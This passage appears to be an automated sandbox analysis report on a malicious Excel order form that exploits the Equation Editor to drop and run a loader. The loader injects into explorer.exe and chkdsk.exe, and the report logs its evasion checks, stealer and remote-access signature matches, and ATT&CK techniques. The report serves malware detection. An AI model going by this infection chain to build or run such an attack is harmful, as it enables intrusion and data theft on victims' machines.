Source: C:\Users\Public\vbc.exe; Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\Desktop\~$BON DE COMMANDE POUR CHENOUFI AEK.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\CVR6595.tmp
Source: classification engine; Classification label: mal100.troj.expl.evad.winXLSX@11/16@0/1
Source: C:\Users\Public\vbc.exe; Code function: 4_2_004021AA CoCreateInstance
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe; Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
Source: explorer.exe, 00000007.00000000.1012455681.0000000003B10000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder; Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: C:\wxiwy\cojnmd\dyrz\70c437f178a447d5b5e03abf78ad86d5\khqwan\zzevlnko\Release\zzevlnko.pdb source: vbc.exe, 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmp, bmexo.exe, 00000005.00000002.979347417.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000005.00000000.968231879.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, bmexo.exe, 00000006.00000000.974589862.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp, chkdsk.exe, 00000008.00000002.1174039918.0000000002887000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173217045.00000000003B3000.00000004.00000020.00020000.00000000.sdmp, nsmD99.tmp.4.dr, bmexo.exe.4.dr
          Source: Binary string: chkdsk.pdb source: bmexo.exe, 00000006.00000002.1050114953.0000000000030000.00000040.10000000.00040000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050401037.0000000000714000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: bmexo.exe, bmexo.exe, 00000006.00000003.981359909.0000000000800000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000003.979000602.00000000002B0000.00000004.00000800.00020000.00000000.sdmp, bmexo.exe, 00000006.00000002.1051582479.0000000000B10000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000008.00000002.1173724762.0000000002500000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1050200391.0000000002090000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000003.1051411235.00000000021F0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D01A4 push 28D37A0Fh; iretd 2_2_035D01B1
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D0126 push 28D37A0Fh; iretd 2_2_035D01B1
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 5_2_00F22445 push ecx; ret 5_2_00F22458
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_004172EC push DC386EC8h; ret 6_2_00417309
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0040FCF7 push ebp; ret 6_2_0040FCF8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D662 push eax; ret 6_2_0041D668
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D66B push eax; ret 6_2_0041D6D2
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D615 push eax; ret 6_2_0041D668
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_0041D6CC push eax; ret 6_2_0041D6D2
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exeCode function: 6_2_00F22445 push ecx; ret 6_2_00F22458
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0239DFA1 push ecx; ret 8_2_0239DFB4
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000A72EC push DC386EC8h; ret 8_2_000A7309
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD615 push eax; ret 8_2_000AD668
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD66B push eax; ret 8_2_000AD6D2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD662 push eax; ret 8_2_000AD668
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_000AD6CC push eax; ret 8_2_000AD6D2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_0009FCF7 push ebp; ret 8_2_0009FCF8
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\bmexo.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035D050B URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_035D050B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

          Boot Survival

          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00F21890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 5_2_00F21890
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\chkdsk.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_5-7746
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | RDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | RDTSC instruction interceptor: First address: 0000000000408F9E second address: 0000000000408FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 0000000000098C04 second address: 0000000000098C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\chkdsk.exe | RDTSC instruction interceptor: First address: 0000000000098F9E second address: 0000000000098FA4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1320 | Thread sleep time: -480000s >= -30000s
          Source: C:\Windows\SysWOW64\chkdsk.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_5-6885
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 6_2_00408ED0 rdtsc 6_2_00408ED0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node graph_2-627
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node graph_2-683
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | API call chain: ExitProcess graph end node graph_2-665
          Source: C:\Users\Public\vbc.exe | API call chain: ExitProcess graph end node graph_4-3510
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | API call chain: ExitProcess graph end node graph_5-6886
          Source: explorer.exe, 00000007.00000000.1002012184.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000e
          Source: explorer.exe, 00000007.00000000.994421316.000000000869E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.987724559.00000000002AF000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000007.00000000.1034386831.000000000037B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 00000007.00000000.989955788.0000000004423000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.1041586211.000000000434F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: explorer.exe, 00000007.00000000.1002012184.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 00000007.00000000.1009149384.0000000000335000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00F27A95 IsDebuggerPresent, 5_2_00F27A95
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00F2558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 5_2_00F2558A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00F286ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 5_2_00F286ED
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 6_2_00408ED0 rdtsc 6_2_00408ED0
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exe | Process token adjusted: Debug
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_035D0591 mov edx, dword ptr fs:[00000030h] 2_2_035D0591
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_001603F8 mov eax, dword ptr fs:[00000030h] 5_2_001603F8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_0016061D mov eax, dword ptr fs:[00000030h] 5_2_0016061D
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_001606F7 mov eax, dword ptr fs:[00000030h] 5_2_001606F7
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00160736 mov eax, dword ptr fs:[00000030h] 5_2_00160736
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00160772 mov eax, dword ptr fs:[00000030h] 5_2_00160772
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 6_2_009B26F8 mov eax, dword ptr fs:[00000030h] 6_2_009B26F8
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 8_2_02380080 mov ecx, dword ptr fs:[00000030h] 8_2_02380080
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 8_2_023800EA mov eax, dword ptr fs:[00000030h] 8_2_023800EA
          Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 8_2_023A26F8 mov eax, dword ptr fs:[00000030h] 8_2_023A26F8
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 6_2_0040A140 LdrLoadDll, 6_2_0040A140
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00F243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_00F243CC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00F2439B SetUnhandledExceptionFilter, 5_2_00F2439B
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 6_2_00F243CC SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00F243CC
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 6_2_00F2439B SetUnhandledExceptionFilter, 6_2_00F2439B

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Section unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 80000
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Section loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Memory written: C:\Users\user\AppData\Local\Temp\bmexo.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Thread register set: target process: 1860
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Thread register set: target process: 1860
          Source: C:\Windows\SysWOW64\chkdsk.exe | Thread register set: target process: 1860
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Process created: C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya
          Source: C:\Windows\SysWOW64\chkdsk.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bmexo.exe"
          Source: explorer.exe, 00000007.00000000.1034648528.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.997360427.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1009986112.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.1034648528.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.983528544.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1034341934.0000000000335000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.1034648528.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.997360427.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1009986112.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00F23283 cpuid 5_2_00F23283
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\bmexo.exe | Code function: 5_2_00F23EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 5_2_00F23EC8
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403646

          Stealing of Sensitive Information

          Source: Yara match | File source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 6.0.bmexo.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.bmexo.exe.170000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.bmexo.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.bmexo.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.bmexo.exe.170000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.bmexo.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000006.00000000.977269250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1173044498.0000000000300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.976211361.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1007465925.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.979111122.0000000000170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1050132752.00000000000F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1050273447.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1020176757.000000000A9D3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1050307444.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1172976610.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 1 Scripting | Path Interception | 1 Access Token Manipulation | 111 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 512 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 151 Security Software Discovery | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | 33 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
